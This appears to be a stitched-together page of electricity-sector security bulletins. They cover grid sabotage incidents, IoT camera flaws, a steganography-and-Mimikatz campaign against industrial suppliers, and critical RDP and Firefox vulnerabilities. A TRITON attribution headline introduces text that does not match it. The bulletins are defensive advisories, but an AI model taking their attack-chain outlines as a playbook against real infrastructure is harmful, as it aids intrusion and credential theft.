FireEye TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers
In a previous blog post FireEye detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility in the Middle East. In this blog post FireEye provides additional information linking the theat group's activity surrounding the TRITON intrusion to a Russian government-owned research institute.
Details: Recent open source articles have noted a few incidents resulting in power outages in Zimbabwe, Bangladesh, and Venezuela. While these are international incidents, they are of interest as the tactics could be an inspiration to those who wish to sabotage the electric grid in North America as well as being a reminder of that damage that can be done.
Bangladesh: In an apparent sabotage effort, nine electric meters caught on fire in four separate locations in Bagerhat. All fires occurred simultaneously after midnight within a quarter of a kilometer from each other. The fire was not due to any short circuit or fault.
Zimbabwe: Transformer vandalism and theft has resulted in power outages over the past week, particularly in Marlborough. Residents have noted outage has affected business, lack of water, reduced ability to use facilities, and other health hazards. The Zimbabwe Electricity Supply Authority (ZESA) noted that it takes about five months to replace transformers due to lack of funds. Over 2,200 transformers have been stolen across the country.
Venezuela: Most of the country faced an approximate 7-hour blackout starting on November 29, affecting 23 of 24 states. The power company, Corpoelec, claimed that there was sabotage at a hydroelectric plant that caused the blackout, though additional details have not been released.
E-ISAC Analyst Note: While this did not take place in North America and the E-ISAC has not seen any evidence that these incidents will spark actions in North America, it is important to maintain awareness of incidents such as these, as they emphasize the impact of vandalizing electricity related infrastructure.
If further information becomes available, it will be added as an update to this post
This article, written by researcher Brian Krebs, describes critical security flaws that can expose security cameras and internet-capable consumer electronic devices to eavesdropping, credential theft, and remote compromise. The flaws include a weakness in peer-to-peer (P2P) communications technology and several other critical vulnerabilities.
The flawed software was developed by China-based Shenzhen Yunni Technology and is bundled with millions of Internet of Things (IoT) devices, including security cameras and Webcams, baby monitors, smart doorbells, and digital video recorders. These types of devices are attractive to consumers because of their easy-access remote-access capabilities and ease of installation. This kind of ease of use and convenience can sometimes cost consumers in security and privacy; this article describes these in great detail.
Leaked Huawei Employment Records May Show Links to Chinese Military and Intelligence Agencies
According to The Telegraph, leaked information from Huawei staff's CVs showed some employees had links to China's Military and Intelligence Community. The article details that some employees trained at China's military academy, served as agents of the Ministry of State Security and collaborated with the Chinese People's Liberation Army.
In May of 2020, cyber security firm Kaspersky reported a form of malware allegedly targeting the supply chains of industrial organizations in the energy sector in Italy, the UK and Germany.
Initial delivery is though a phishing email specifically catered to its target and contains a malicious MS Office document. When a user interacts with the document, a script is triggered that downloads an image which contains the new malware hidden in the image. Using steganography to hide code in images is known attack technique because of its effectivesness; code imbedded in images is difficult for antivirus and other IDS devices to detect. The image file then executes a PowerShell script that eventually leverages Mimikatz to steal Windows credentials.
Potential impacts from targeted malware of this nature can result in disclosure of legitimate network credentials to an adversary. Adversaries use these credentials to “live off the land” in a target’s environment in part because misuse of legitimate network credentials is difficult to detect.
MITRE ATT@CK Mapping:
What to Do:
A robust and ongoinig cyber security awareness program that includes training personnel on how to recognize and report phishing and suspicious emails can assist in stopping malicious emails from entering your envinronments. Additionally, evaluating and understanding the cyber security program at trusted suppliers is important in maintaining a relationship built on mutual trust.
Kovacs, Eduard (2020). Industrial Suppliers in Japan, Europe Targeted in Sophisticated Attacks. Retrieved May 28, 2020. Retrieved from hXXps://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true [hXXps://www.securityweek.com/industrial-suppliers-japan-europe-targeted-sophisticated-attacks?&web_view=true]
Goodin, Dan. (2020). An advanced and unconventional hack is targeting industrial firms. May 30, 2020. Retrieved from hXXps://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/ [hXXps://arstechnica.com/information-technology/2020/05/an-advanced-and-unconventional-hack-is-targeting-industrial-firms/]
Steganography in Targeted Attacks on Indutrial Enterprises. Retrieved from hXXps://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/ [hXXps://ics-cert.kaspersky.com/reports/2020/05/28/steganography-in-targeted-attacks-on-industrial-enterprises/]
March Event - CYBER STRIKE WORKSHOP
The training will offer attendees a hands-on, simulated demonstration of a cyber-attack, drawing from elements of the December 2015 Ukraine cyber incident. The workshop will be conducted by utilizing a series of exercises/labs listed below that workshop attendees will have to work through in teams. Other topics that will be referenced include the North American Electric Reliability Corporation (NERC) alert related to the 2015 Ukraine cyber incident and the applicability of NERC Critical Infrastructure Protection (CIP) reliability standards* for such an incident. However, the primary focus will not be standards, but rather understanding the Ukraine cyber incident from a technical perspective to enhance cyber preparedness.
experts will come together to share ideas, methods, and techniques for defending control systems. In-depth
presentations and interactive panel discussions will highlight real-world approaches that work and make a difference
for the individuals fighting this fight every day.
Microsoft Addresses Critical Vulnerability in Remote Desktop Services with Patch to Include Unsupported Operating Systems
A potentially wormable, critical remote code execution vulnerability exists in Microsoft's Remote Desktop Services. This is documented in CVE-2019-0708. Microsoft has provided a patch to mitigate this, however it is noteworthy that they have also provided a patch for older, unsupported operating system versions due to the severity of the vulnerability.
The vulnerability could potentially allow an unauthenticated attacker to execute arbitrary code on the target system with full administrative rights.
Due to the fact that this vulnerability could allow wormable execution with no user interaction, the E-ISAC recommends researching the CVE and ensuring that any vulnerable systems in member environments are patched expeditiously.
Microsoft issued a public advisory yesterday in light of the need for many companies to suddenly shift to an increase in employees working from home in response to the global pandemic COVID-19. The article highlighted the importance of remaining productive without increasing cyber security risk. Some considerations highlighted include implementing official chat tools to allow for a proper communication channel for the workforce, utilization of Azure AD Conditional Access [hXXps://docs.microsoft.com/en-us/azure/active-directory/conditional-access/overview] to secure access to cloud applications, and the Azure AD Application Proxy [hXXps://docs.microsoft.com/en-us/azure/active-directory/manage-apps/what-is-application-proxy] for publishing on-premises applications for remote availability.
Due to the increase in remote work, it is highly likely that organizations will also see an increase in the use of personal devices accessing company data. Therefore, using Azure AD Conditional Access and Microsoft Intune app protection policies [hXXps://docs.microsoft.com/en-us/azure/active-directory/conditional-access/app-protection-based-conditional-access] together can help manage and protect corporate data in approved applications on these personal devices. One of the best ways to improve security for employees working from home is to utilize multi-factor authentication by utilizing Windows Hello biometrics as well as smartphone authentication apps like Microsoft Authenticator.
For the full report by Microsoft, please visit: hXXps://www.microsoft.com/security/blog/2020/03/12/support-working-from-home-securely/
On April 3, 2020, Mozilla announced that it had released security updates in order to patch critical vulnerabilities in found in both Firefox and Firefox Extended Support Release (ESR) by security researchers with JMP Security.
Both vulnerabilities allow for race conditions which can cause a use-after-free issue. The first vulnerability, CVE-2020-6819, allows for a race condition when running the nsDocShell destructor (under certain conditions). The second vulnerability, CVE-2020-6820, allows for a race condition when handling a ReadableStream (under certain conditions).
According to the Department of Homeland Security Cybersecurity and Infrastructure Security Agency’s United States Computer Emergency Readiness Team (US-CERT) program, “an attacker could exploit these vulnerabilities to take control of an affected system.”
“Both bugs…allow remote attackers to execute arbitrary code or trigger crashes on machines running versions of Firefox prior to 74.0.1 and its business-friendly Firefox Extended Support Release 68.6.1,” a researcher at ThreatPost said.
Mozilla said that they are aware of both vulnerabilities being used in targeted attacks by hackers.
One of the researchers who discovered the vulnerabilities, Francisco Alonso, tweeted that “there is still lots of work to do and more details to be published (including other browsers). Stay tuned.”
It is highly recommended that all Firefox users download and apply the latest patches in order to protect themselves from exploitation of these critical vulnerabilities.
For additional information, please see the following sources:
Mozilla. Mozilla Foundation Security Advisory 2020-11. April 3, 2020. hXXps://www.mozilla.org/en-US/security/advisories/mfsa2020-11/
Mozilla. Firefox Update. April 3, 200. hXXps://support.mozilla.org/en-US/kb/update-firefox-latest-release
DHS CISA US-CERT. Mozilla Patches Critical Vulnerabilities in Firefox, Firefox ESR. April 3, 2020. hXXps://www.us-cert.gov/ncas/current-activity/2020/04/03/mozilla-patches-critical-vulnerabilities-firefox-firefox-esr
Tom Spring. Firefox Zero-Day Flaws Exploited in the Wild Get patched. April 4, 2020. hXXps://threatpost.com/firefox-zero-day-flaws-exploited-in-the-wild-get-patched/154466/The E-ISAC has not established any specified threat to the electricity community based upon these vulnerabilities. However, as the information above and in the links indicates, the likelihood of adversarial action based upon this vulnerability is high. If this or any other adversarial action is experienced, contact the E-ISAC Watch Operations Team [mailto:operations[@]eisac.com], and create a Portal Post for instant community awareness.